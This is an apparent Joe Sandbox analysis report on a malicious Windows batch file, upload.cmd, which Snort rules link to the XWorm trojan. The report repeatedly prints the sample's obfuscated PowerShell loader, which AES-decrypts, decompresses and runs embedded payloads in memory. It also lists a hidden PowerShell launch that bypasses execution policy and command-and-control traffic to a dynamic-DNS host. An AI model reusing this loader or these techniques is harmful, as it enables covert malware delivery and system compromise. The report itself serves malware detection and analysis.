Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upload.cmd

Overview

General Information

Sample name:upload.cmd
Analysis ID:1446790
MD5:9619f1ddef9f682e7e70d738513fbe95
SHA1:f60d6ccae771e30dd908ed35cd430321011d4e72
SHA256:e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a
Tags:cmd
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7040 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5536 cmdline: cmd /c "set __=^&rem" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3260 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass MD5: 04029E121A0CFA5991749937DD22A1D9)
      • wermgr.exe (PID: 6340 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_5212.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execu
      Sigma detected: Invoke-Obfuscation VAR+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execu
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7040, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5212, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7040, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5212, ProcessName: powershell.exe
      Sigma detected: Gzip Archive Decode Via PowerShell
      Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execu
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7040, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5212, ProcessName: powershell.exe

      Snort Signatures

      Timestamp:05/23/24-21:13:21.470006
      SID:2855924
      Source Port:49705
      Destination Port:8896
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:16:08.014695
      SID:2852870
      Source Port:8896
      Destination Port:49705
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:14:37.459862
      SID:2853193
      Source Port:49705
      Destination Port:8896
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:16:05.951406
      SID:2852874
      Source Port:8896
      Destination Port:49705
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 12.202.180.134:8896
      Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8896 -> 192.168.2.8:49705
      Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8896 -> 192.168.2.8:49705
      Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 12.202.180.134:8896
      Uses dynamic DNS services
      Source: unknownDNS query: name: xgmn934.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.8:49705 -> 12.202.180.134:8896
      Source: Joe Sandbox ViewIP Address: 12.202.180.134 12.202.180.134
      Source: Joe Sandbox ViewASN Name: FISERV-INCUS FISERV-INCUS
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: xgmn934.duckdns.org
      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: classification engineClassification label: mal84.troj.evad.winCMD@9/9@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\2utLZrxcByvppTdF
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1c1yq3g.11p.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
